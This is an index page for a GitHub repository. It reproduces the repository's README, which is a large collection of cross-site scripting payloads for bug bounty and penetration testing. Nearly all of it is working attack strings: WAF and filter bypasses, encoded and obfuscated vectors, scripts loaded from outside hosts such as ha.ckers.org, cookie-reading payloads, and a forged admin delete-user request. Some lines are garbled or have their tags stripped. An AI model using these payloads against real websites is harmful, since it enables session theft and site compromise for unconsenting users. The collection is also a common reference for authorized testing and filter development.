Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ihebski/XSS-Payloads
Collection of XSS Payloads for fun and profit
https://github.com/ihebski/XSS-Payloads
bugbounty bughunter javascript payloads pentesting xss-exploitation xss-payloads
Last synced: about 22 hours ago
JSON representation
Collection of XSS Payloads for fun and profit
- Host: GitHub
- URL: https://github.com/ihebski/XSS-Payloads
- Owner: ihebski
- Created: 2018-12-02T19:06:25.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-08-14T12:19:14.000Z (over 4 years ago)
- Last Synced: 2024-05-01T13:35:11.368Z (9 months ago)
- Topics: bugbounty, bughunter, javascript, payloads, pentesting, xss-exploitation, xss-payloads
- Homepage:
- Size: 93.8 KB
- Stars: 150
- Watchers: 10
- Forks: 60
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-security-vul-llm - ihebski/XSS-Payloads - Payloads?style=flat-square) - 包含各种标准和最新的XSS攻击向量payload代码示例 (LLM分析过程)
README
# XSS-Payloads
XSS Payloads collection for testing web application during an engagement
## Payloads for 2020 - Some updates
Extracted from https://netsec.expert/2020/02/01/xss-in-2020.html (Awesome work)
*SVG*
```javascript
# newline char
# tab char
# new page char (0xc)
```
*Standard HTML events*
```javascript
(firefox only)
(firefox only)
(firefox only)
(chrome & opera only)
```
*Standard HTML events - Video load*
```javascript
```
*CSS-based events*
```javascript
@keyframes x {}
XSS
XSS
```
*Weird XSS vectors*
```javascript
```
---
```javascript
By MrPapercut
/**
* JS without english, slash, plus or minus
* (as extra challenge: no numbers or different-language characters either)
* First we need a few numbers
0: []<<[]
1: !!{}<Bypass WAF
```javascript
alert(1)-%26apos%3B
anythinglr00alert(document.domain)uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
Payloads
```javascript
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(�XSS�)
alert(�XSS�);
alert(�XSS�)
�>alert(�XSS�)
alert(/XSS�)
alert(/XSS/)
alert(1)
�; alert(1);
�)alert(1);//
alert(1)
![]()
;%EF%BF%BD)
![]()
![]()
{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
alert(0%0)
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/
|\>''alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);
X
http://www.alert(1)
alert(1)
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
+-+-1-+-+alert(1)
/*<script* */alert(1)//
confirm(1);
alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) style="x:">
<--`![]()
--!>
x
">
CLICKME
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�;alert(String.fromCharCode(88,83,83))//�>�>�>alert(String.fromCharCode(88,83,83))
![]()
alert(�XSS�)�>
![]()
;%EF%BF%BD)
<alert(�XSS�);//<
%253cscript%253ealert(1)%253c/script%253e
�>alert(document.cookie)
fooalert(1)
ipt>alert(1)ipt>
![]()
![]()
![]()
%EF%BF%BD)
![]()
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
//)
<img src="
foo=">alert(1)">
alert(1)">
foo=">alert(1)">
foo=">">
<% foo>
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
�scriptualert(EXSSE)�/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
![]()
<alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
�script�alert(�XSS�)�/script�
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="
foo=">alert(1)">
alert(1)">
foo=">alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
�>alert(document.cookie)
�>alert(document.cookie)
�><alert(document.cookie);//<
fooalert(document.cookie)
ipt>alert(document.cookie)ipt>
%22/%3E%3CBODY%20onload=�document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)�%3E
�; alert(document.cookie); var foo=�
foo\�; alert(document.cookie);//�;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
>
;!--"=&{()}"
![]()
![]()
![]()
![]()
![]()
![]()
alert("XSS")">
![]()
![]()
![]()
![]()
perl -e 'print ")
";' > out
![]()
<alert("XSS");//<
\";alert('XSS');//
![]()
alert(/XSS/.source)
alert("XSS");
![]()
![]()
![]()
"
@im\port'\ja\vasc\ript:alert("XSS")';
![]()
alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
]]>
)
">
echo('alert("XSS")'); ?>
//-->">'>alert(String.fromCharCode(88,83,83))
![]()
;)
=alert('XSS');">
- XSS
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
,
&alert('XSS');">
;};)
<!--alert('XSS');//-->
alert('XSS');;
[\xC0][\xBC]script>alert('XSS');[\xC0][\xBC]/script>
]]
X
onload=alert(/XSS/)>
onload=alert(/XSS/)>
" onfocus=alert(XSS) "> <"
" onblur=alert(XSS) "> <"
" onmouseover=alert(XSS) ">
" onclick=alert(XSS) ">
li {list-style-image: url(\"javascript:alert('XSS')\");}
- XSS
'">alert(XSS)
'""> alert('X \nS \nS');
<<<<>>>><<<script>alert(XSS)
(XSS)(XSS)
'>alert(XSS)
}a=eval;b=alert;a(b(/XSS/.source));
document.write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='>alert("xss")
alert(XSS)>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
alert('XSS');
'';!--"=&{()}
![]()
![]()
![]()
![]()
![]()
![]()
id=XSS SRC=![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
<IMG id=XSS SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" id=XSS SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNid=XSS SRC="javascript:alert('XSS')">
<IMG LOWid=XSS SRC="javascript:alert('XSS')">
<BGSOUND id=XSS SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER id=XSS SRC="http://xxxx.com/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://xxxx.com/xss.css">
<STYLE>@import'http://xxxx.com/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://xxxx.com/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://xxxx.com/xssmoz.xml#xss")}</STYLE>
<IMG id=XSS SRC='vbscript:msgbox("XSS")'>
<IMG id=XSS SRC="mocha:[code]">
<IMG id=XSS SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME id=XSS SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME id=XSS SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://xxxx.com/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><
Null-byte character between HTML attribute name and equal sign (IE, Safari).
Slash character between HTML attribute name and equal sign (IE, Firefox, Chrome, Safari).
Vertical tab between HTML attribute name and equal sign (IE, Safari).
Null-byte character between equal sign and JavaScript code (IE).
Null-byte character between characters of HTML attribute names (IE).
Null-byte character before characters of HTML element names (IE).
<\x00img src='1' onerror=alert(0) />
Null-byte character after characters of HTML element names (IE, Safari).
alert(1)
Null-byte character between characters of HTML element names (IE).
Use slashes instead of whitespace (IE, Firefox, Chrome, Safari).
![]()
Use vertical tabs instead of whitespace (IE, Safari).
![]()
Use quotes instead of whitespace in some situations (Safari).
Use null-bytes instead of whitespaces in some situations (IE).
Just don't use spaces (IE, Firefox, Chrome, Safari).
Prefix URI schemes.
Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)
No greater-than characters needed (IE, Firefox, Chrome, Safari).
alert(0)
Backslash character between expression and opening parenthesis (IE).
body{background-color:expression\(alert(1))}
JavaScript Escaping
document.write('<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>');
Encoding Galore.
HTML Attribute Encoding
URL Encoding
CSS Hexadecimal Encoding (IE specific examples)
Joker
Joker
Joker
Joker
JavaScript (hexadecimal, octal, and unicode)
document.write('<img src=1 onerror=alert(1)>');
document.write('\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E');
document.write('\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076');
document.write('\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E');
JavaScript (Decimal char codes)
document.write('<img src=1 onerror=alert(1)>');
document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));
JavaScript (Unicode function and variable names)
alert(123)
\u0061\u006C\u0065\u0072\u0074(123)
Overlong UTF-8 (SiteMinder is awesome!)
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
UTF-7 (Missing charset?)
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
Unicode .NET Ugliness
alert(1)
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e
Classic ASP performs some unicode homoglyphic translations... don't ask why...
%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A
Useless and/or Useful features.
HTML 5 (Not comphrensive)
Usuage of non-existent elements (IE)
CSS Comments (IE)
Alternate ways of executing JavaScript functions
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
Split up JavaScript into HTML attributes
HTML is parsed before JavaScript
var junk = 'alert(1)';
HTML is parsed before CSS
body { background-image:url('http://www.blah.com/alert(1)'); }
XSS in XML documents [doctype = text/xml] (Firefox, Chrome, Safari).
URI Schemes
(IE)
(Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)
HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2
Two Stage XSS via fragment identifier (bypass length restrictions / avoid server logging)
eval(location.hash.slice(1))
eval(location.hash) (Firefox)
http://target.com/something.jsp?inject=eval(location.hash.slice(1))#alert(1)
Two Stage XSS via name attribute
Non-alphanumeric crazyness...
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();
